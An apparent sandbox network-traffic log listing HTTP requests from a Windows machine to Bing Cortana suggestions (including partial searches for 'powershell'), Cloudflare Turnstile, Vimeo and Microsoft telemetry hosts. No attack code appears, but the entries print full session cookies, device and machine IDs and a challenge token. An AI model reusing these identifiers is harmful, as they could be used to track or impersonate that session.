          Source: global trafficHTTP traffic detected: GET /rp/CRJMH8ar3a3tHOTBEOmE9-4tZPg.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=4590362BB5CF472B95BBEDB3112D4B7B; _SS=SID=19FF0D34A8246FAD33EA189CA9E56EAD&CBV=54277149&CPID=1741339336683&AC=1&CPH=01beaa36; _EDGE_S=SID=128F177EAEC96EC83CF802D6AFDF6F95&mkt=de-ch; SRCHUID=V=2&GUID=79A4A21CD5314D11975C5022FA7E18FB&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=68baa303&IPMID=1741339336683&SRCHLANG=de&LUT=1741339335365; CortanaAppUID=99325A50A46066F842A6B684698F464A; TOptOut=1; ak_bmsc=A88CDCB57762C2831119E8D19390832D~000000000000000000000000000000~YAAQFthUuAcZ0i+XAQAALpzqRhwwv8dujg5AfSbMiYGu/1ZsIZ4Sjvz59ZCkaYjouGk3AKmkBsJw3nJzEaWbGZthLzpJX2+IRoIG6FzSq1cPK5ICfT6HzNAmdQbK/vFAdR1YHvUOm0LBH1jgvYVkqecPdpQ6Kwc+ZLW7D+t/NUlrxUx0Z5O8k7S/Vrisiu6NEzpwwnTEG7gunBDJZyI1Wqbfg0hL4J34Uv76z24fC8x9zWRukEZQYs0TJXhI/UHDY2edd86ZLYcXsbmij6mSrXv7uqH6dGH+KVse0ALE74ijMXCycVrRQ9Wve6c3JgV0atfbVKkOHuKgYbEaOChW4gAKXMIR8k4wKZzQQzhSqWF9d6CR5J0yy3AdKLL+q6Hg69reZU7lVQ==; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
          Source: global trafficHTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=powershe&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=8&cvid=af41f482fd644dc08e178ad70ac98253&ig=bbaaa87cbeb84a5cbc94be882d75ec3c HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHx-agent-deviceid: 01000A41090080B6x-bm-cbt: 1741339336x-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66Ex-device-clientsession: C75A5C1ACC1D40039390493A0AF03405x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A41090080B6x-msedge-externalexp: d-thshld42,d-thshld78,d-thshldspcl40,padtmpmsgc,psdupt,sappcsfixt,wsbref-cx-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: No
          Source: global trafficHTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=powersh&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=7&cvid=af41f482fd644dc08e178ad70ac98253&ig=cc413f5a3fd04e32b55e61a85c42466e HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHx-agent-deviceid: 01000A41090080B6x-bm-cbt: 1741339336x-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66Ex-device-clientsession: C75A5C1ACC1D40039390493A0AF03405x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A41090080B6x-msedge-externalexp: d-thshld42,d-thshld78,d-thshldspcl40,padtmpmsgc,psdupt,sappcsfixt,wsbref-cx-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: Non
          Source: global trafficHTTP traffic detected: GET /rp/Cj3ZU8zX_sufjrVdLFel-pJdQTs.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=4590362BB5CF472B95BBEDB3112D4B7B; _SS=SID=19FF0D34A8246FAD33EA189CA9E56EAD&CBV=54277149&CPID=1741339336683&AC=1&CPH=01beaa36; _EDGE_S=SID=128F177EAEC96EC83CF802D6AFDF6F95&mkt=de-ch; SRCHUID=V=2&GUID=79A4A21CD5314D11975C5022FA7E18FB&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=68baa303&IPMID=1741339336683&SRCHLANG=de&LUT=1741339335365; CortanaAppUID=99325A50A46066F842A6B684698F464A; TOptOut=1; ak_bmsc=A88CDCB57762C2831119E8D19390832D~000000000000000000000000000000~YAAQFthUuAcZ0i+XAQAALpzqRhwwv8dujg5AfSbMiYGu/1ZsIZ4Sjvz59ZCkaYjouGk3AKmkBsJw3nJzEaWbGZthLzpJX2+IRoIG6FzSq1cPK5ICfT6HzNAmdQbK/vFAdR1YHvUOm0LBH1jgvYVkqecPdpQ6Kwc+ZLW7D+t/NUlrxUx0Z5O8k7S/Vrisiu6NEzpwwnTEG7gunBDJZyI1Wqbfg0hL4J34Uv76z24fC8x9zWRukEZQYs0TJXhI/UHDY2edd86ZLYcXsbmij6mSrXv7uqH6dGH+KVse0ALE74ijMXCycVrRQ9Wve6c3JgV0atfbVKkOHuKgYbEaOChW4gAKXMIR8k4wKZzQQzhSqWF9d6CR5J0yy3AdKLL+q6Hg69reZU7lVQ==; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
          Source: global trafficHTTP traffic detected: GET /conf/v2/asgw/fpconfig.min.json?monitorId=asgw HTTP/1.1host: fp.msedge.netorigin: https://www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/pat/94baa20e3cecf0c1/1749241465741/4f5eea7cc017bee1780f8953e7ef12a5f147cedfb8d9eaf0208af1b971603b72/E4mFbwjF0D0pz2- HTTP/1.1host: challenges.cloudflare.comcache-control: max-age=0sec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activereferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/bzax3/0x4AAAAAAAbaszMygKLnGbeo/auto/fbE/new/normal/auto/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
          Source: global trafficHTTP traffic detected: GET /rp/Dn5Iypmm_cLV_tG2zZt_ZqSWy5o.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=4590362BB5CF472B95BBEDB3112D4B7B; _SS=SID=19FF0D34A8246FAD33EA189CA9E56EAD&CBV=54277149&CPID=1741339336683&AC=1&CPH=01beaa36; _EDGE_S=SID=128F177EAEC96EC83CF802D6AFDF6F95&mkt=de-ch; SRCHUID=V=2&GUID=79A4A21CD5314D11975C5022FA7E18FB&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=68baa303&IPMID=1741339336683&SRCHLANG=de&LUT=1741339335365; CortanaAppUID=99325A50A46066F842A6B684698F464A; TOptOut=1; ak_bmsc=A88CDCB57762C2831119E8D19390832D~000000000000000000000000000000~YAAQFthUuAcZ0i+XAQAALpzqRhwwv8dujg5AfSbMiYGu/1ZsIZ4Sjvz59ZCkaYjouGk3AKmkBsJw3nJzEaWbGZthLzpJX2+IRoIG6FzSq1cPK5ICfT6HzNAmdQbK/vFAdR1YHvUOm0LBH1jgvYVkqecPdpQ6Kwc+ZLW7D+t/NUlrxUx0Z5O8k7S/Vrisiu6NEzpwwnTEG7gunBDJZyI1Wqbfg0hL4J34Uv76z24fC8x9zWRukEZQYs0TJXhI/UHDY2edd86ZLYcXsbmij6mSrXv7uqH6dGH+KVse0ALE74ijMXCycVrRQ9Wve6c3JgV0atfbVKkOHuKgYbEaOChW4gAKXMIR8k4wKZzQQzhSqWF9d6CR5J0yy3AdKLL+q6Hg69reZU7lVQ==; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/d/94baa20e3cecf0c1/1749241465742/9hRm9Vo2FHLZtLF HTTP/1.1host: challenges.cloudflare.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/bzax3/0x4AAAAAAAbaszMygKLnGbeo/auto/fbE/new/normal/auto/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
          Source: global trafficHTTP traffic detected: GET /video/901646435?app_id=122963&referrer=https%3A%2F%2Fwww.elevate.inc%2F&turnstile=0.GsMSK-bq_6Dw7Z12N0HtPrRqgM-dyd0FX8WfLxT_rRih1puNh1hjGKHKdo5-wgki2zw3UwGyC-T9IDfQW_CRhOZDXtUwfrlEDjNWPIxNoNWlomlfELlBkhK0hMsRwoVWBZ3WM7YyNnJe31ZFyLwgY8DyWBADE3hYv_t1x-p8lZYwd2LCKvBzJJ9p77kMItavwtuUqt3TA9Ti5Z0fCvXpF8xjE-zoYaF-1n2PKkbc6IUZMYynFNElBrh2pBVZbmYj0yABEdvy0UVeGCPmkulNycNOkpodwEjbOOdscBXvAq7EVaFqe-TYQY4eluK0dmGY1qTkXjih41skt-x5RawygyFZ7KOz0W2es0DpiHN9S-fEmdTQqyBiHdjqWhTJ8E-ujroXjfwsI7zlCe6z9EBWm4Ta-d0bck6Zbs6RrWa2g7HpUjX25tXPKIDyOiWHi9lgJMb27bDly8w7oVd3l_1RpLrIuMNkOOjLEnjJi9De8K3dgcH0ixedEDNQ1QrVXqyISZIWDpT3ieBx7xwz4QGNWCYNal2mAuq-RkLO5qTtZ_YXeaacZPHvDlTr4RHgJInoJGovuOgK7hXi3WUAHAhTNEXsN4HHVx2N8jyjHduQfDVWrUtvTv1nu3g_F-OLlIJOJjkktFKI5jj1WvqEMT5aVzxIeXWA-JIz1eI0plyvmxjEaGxgYXqiY6ITfLnVQ5Y8rZFTzFpFxggztM_BQ-GVth7uB-8JDzzni8C7blYlCBo13vvNfqBPk6Ql1jkPrk1FWuRa8q_zC3Xb0EmY31RcmIhfTqiF0h_DKGbEGvvI1hmWhChBto7fDpZGAMpcFUdrMnCTy4XB2qL86Kfdhgd7ETjYAyLOzMNjMDrnvr67XVM.Oq_zSKH9gEztVXz8A3JW9w.9b6f10a675d65c3879691981dad8573ea2ab280ecbface1e8dc434537c914c4c&ref=https%253A%252F%252Fcdn.embedly.com%252F HTTP/1.1Host: player.vimeo.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/d/94baa20e3cecf0c1/1749241465742/9hRm9Vo2FHLZtLF HTTP/1.1host: challenges.cloudflare.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/898255625:1749238311:8Cbx_g0w1LkNoQTGxDMlteRtPvT6QqEgj3HnY0BLNKg/94baa2087ffef0c1/XF635rvv7mrJbsOB8_7EF5RUF4iFLEATlKmx9YNmPHU-1749241463-1.2.1.1-he0h_DqUGZv049ljbGR.y0S2K1IWP20YYxoaR8.QZt1ntsQ92pnuJMZMrnR.KDXc HTTP/1.1host: challenges.cloudflare.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
          Source: global trafficHTTP traffic detected: GET /video/1780645815-06152f51d9ac0a046994d9ba4942d0d82fa2fe1ace9ea600abb9f1075c607855-d?mw=80&q=85 HTTP/1.1host: i.vimeocdn.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://player.vimeo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
          Source: global trafficHTTP traffic detected: GET /rp/GYWzw6Wnh2goOCGJn_s6AhjfSck.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=4590362BB5CF472B95BBEDB3112D4B7B; _SS=SID=19FF0D34A8246FAD33EA189CA9E56EAD&CBV=54277149&CPID=1741339336683&AC=1&CPH=01beaa36; _EDGE_S=SID=128F177EAEC96EC83CF802D6AFDF6F95&mkt=de-ch; SRCHUID=V=2&GUID=79A4A21CD5314D11975C5022FA7E18FB&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=68baa303&IPMID=1741339336683&SRCHLANG=de&LUT=1741339335365; CortanaAppUID=99325A50A46066F842A6B684698F464A; TOptOut=1; ak_bmsc=A88CDCB57762C2831119E8D19390832D~000000000000000000000000000000~YAAQFthUuAcZ0i+XAQAALpzqRhwwv8dujg5AfSbMiYGu/1ZsIZ4Sjvz59ZCkaYjouGk3AKmkBsJw3nJzEaWbGZthLzpJX2+IRoIG6FzSq1cPK5ICfT6HzNAmdQbK/vFAdR1YHvUOm0LBH1jgvYVkqecPdpQ6Kwc+ZLW7D+t/NUlrxUx0Z5O8k7S/Vrisiu6NEzpwwnTEG7gunBDJZyI1Wqbfg0hL4J34Uv76z24fC8x9zWRukEZQYs0TJXhI/UHDY2edd86ZLYcXsbmij6mSrXv7uqH6dGH+KVse0ALE74ijMXCycVrRQ9Wve6c3JgV0atfbVKkOHuKgYbEaOChW4gAKXMIR8k4wKZzQQzhSqWF9d6CR5J0yy3AdKLL+q6Hg69reZU7lVQ==; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
          Source: global trafficHTTP traffic detected: GET /p/4.40.69/css/player.css HTTP/1.1host: f.vimeocdn.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,*/*;q=0.1sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: stylesec-fetch-storage-access: activereferer: https://player.vimeo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=0
          Source: global trafficHTTP traffic detected: GET /rp/JkNbdFZteVn1iWM7HoNcxn3YdVI.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=4590362BB5CF472B95BBEDB3112D4B7B; _SS=SID=19FF0D34A8246FAD33EA189CA9E56EAD&CBV=54277149&CPID=1741339336683&AC=1&CPH=01beaa36; _EDGE_S=SID=128F177EAEC96EC83CF802D6AFDF6F95&mkt=de-ch; SRCHUID=V=2&GUID=79A4A21CD5314D11975C5022FA7E18FB&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=68baa303&IPMID=1741339336683&SRCHLANG=de&LUT=1741339335365; CortanaAppUID=99325A50A46066F842A6B684698F464A; TOptOut=1; ak_bmsc=A88CDCB57762C2831119E8D19390832D~000000000000000000000000000000~YAAQFthUuAcZ0i+XAQAALpzqRhwwv8dujg5AfSbMiYGu/1ZsIZ4Sjvz59ZCkaYjouGk3AKmkBsJw3nJzEaWbGZthLzpJX2+IRoIG6FzSq1cPK5ICfT6HzNAmdQbK/vFAdR1YHvUOm0LBH1jgvYVkqecPdpQ6Kwc+ZLW7D+t/NUlrxUx0Z5O8k7S/Vrisiu6NEzpwwnTEG7gunBDJZyI1Wqbfg0hL4J34Uv76z24fC8x9zWRukEZQYs0TJXhI/UHDY2edd86ZLYcXsbmij6mSrXv7uqH6dGH+KVse0ALE74ijMXCycVrRQ9Wve6c3JgV0atfbVKkOHuKgYbEaOChW4gAKXMIR8k4wKZzQQzhSqWF9d6CR5J0yy3AdKLL+q6Hg69reZU7lVQ==; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
          Source: global trafficHTTP traffic detected: GET /p/4.40.69/js/vendor.module.js HTTP/1.1host: f.vimeocdn.comorigin: https://player.vimeo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: scriptreferer: https://player.vimeo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1
          Source: global trafficHTTP traffic detected: GET /p/4.40.69/js/player.module.js HTTP/1.1host: f.vimeocdn.comorigin: https://player.vimeo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: scriptreferer: https://player.vimeo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1
          Source: global trafficHTTP traffic detected: GET /video/1780645815-06152f51d9ac0a046994d9ba4942d0d82fa2fe1ace9ea600abb9f1075c607855-d?mw=80&q=85 HTTP/1.1host: i.vimeocdn.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
          Source: global trafficHTTP traffic detected: GET /rp/LLlskWvUCMmHCLUYuz8vSh87t6Y.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=4590362BB5CF472B95BBEDB3112D4B7B; _SS=SID=19FF0D34A8246FAD33EA189CA9E56EAD&CBV=54277149&CPID=1741339336683&AC=1&CPH=01beaa36; _EDGE_S=SID=128F177EAEC96EC83CF802D6AFDF6F95&mkt=de-ch; SRCHUID=V=2&GUID=79A4A21CD5314D11975C5022FA7E18FB&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=68baa303&IPMID=1741339336683&SRCHLANG=de&LUT=1741339335365; CortanaAppUID=99325A50A46066F842A6B684698F464A; TOptOut=1; ak_bmsc=A88CDCB57762C2831119E8D19390832D~000000000000000000000000000000~YAAQFthUuAcZ0i+XAQAALpzqRhwwv8dujg5AfSbMiYGu/1ZsIZ4Sjvz59ZCkaYjouGk3AKmkBsJw3nJzEaWbGZthLzpJX2+IRoIG6FzSq1cPK5ICfT6HzNAmdQbK/vFAdR1YHvUOm0LBH1jgvYVkqecPdpQ6Kwc+ZLW7D+t/NUlrxUx0Z5O8k7S/Vrisiu6NEzpwwnTEG7gunBDJZyI1Wqbfg0hL4J34Uv76z24fC8x9zWRukEZQYs0TJXhI/UHDY2edd86ZLYcXsbmij6mSrXv7uqH6dGH+KVse0ALE74ijMXCycVrRQ9Wve6c3JgV0atfbVKkOHuKgYbEaOChW4gAKXMIR8k4wKZzQQzhSqWF9d6CR5J0yy3AdKLL+q6Hg69reZU7lVQ==; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
          Source: global trafficHTTP traffic detected: GET /js_opt/modules/utils/vuid.min.js HTTP/1.1host: f.vimeocdn.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://player.vimeo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /apc/trans.gif?b4b2360df62e9cf0666e60a982b91b70 HTTP/1.1host: l-ring.msedge.netreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5accept-language: en-CHaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
          Source: global trafficHTTP traffic detected: GET /video/1780645815-06152f51d9ac0a046994d9ba4942d0d82fa2fe1ace9ea600abb9f1075c607855-d?mw=600&mh=337 HTTP/1.1host: i.vimeocdn.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://player.vimeo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
          Source: global trafficHTTP traffic detected: GET /apc/trans.gif?64d45b2e0b5acbfe07e333093de52a06 HTTP/1.1host: l-ring.msedge.netreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5accept-language: en-CHaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
          Source: global trafficHTTP traffic detected: GET /rp/LP9hwiqJSIzTqMBfw7Kzjq3wC9A.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=4590362BB5CF472B95BBEDB3112D4B7B; _SS=SID=19FF0D34A8246FAD33EA189CA9E56EAD&CBV=54277149&CPID=1741339336683&AC=1&CPH=01beaa36; _EDGE_S=SID=128F177EAEC96EC83CF802D6AFDF6F95&mkt=de-ch; SRCHUID=V=2&GUID=79A4A21CD5314D11975C5022FA7E18FB&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=68baa303&IPMID=1741339336683&SRCHLANG=de&LUT=1741339335365; CortanaAppUID=99325A50A46066F842A6B684698F464A; TOptOut=1; ak_bmsc=A88CDCB57762C2831119E8D19390832D~000000000000000000000000000000~YAAQFthUuAcZ0i+XAQAALpzqRhwwv8dujg5AfSbMiYGu/1ZsIZ4Sjvz59ZCkaYjouGk3AKmkBsJw3nJzEaWbGZthLzpJX2+IRoIG6FzSq1cPK5ICfT6HzNAmdQbK/vFAdR1YHvUOm0LBH1jgvYVkqecPdpQ6Kwc+ZLW7D+t/NUlrxUx0Z5O8k7S/Vrisiu6NEzpwwnTEG7gunBDJZyI1Wqbfg0hL4J34Uv76z24fC8x9zWRukEZQYs0TJXhI/UHDY2edd86ZLYcXsbmij6mSrXv7uqH6dGH+KVse0ALE74ijMXCycVrRQ9Wve6c3JgV0atfbVKkOHuKgYbEaOChW4gAKXMIR8k4wKZzQQzhSqWF9d6CR5J0yy3AdKLL+q6Hg69reZU7lVQ==; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
          Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
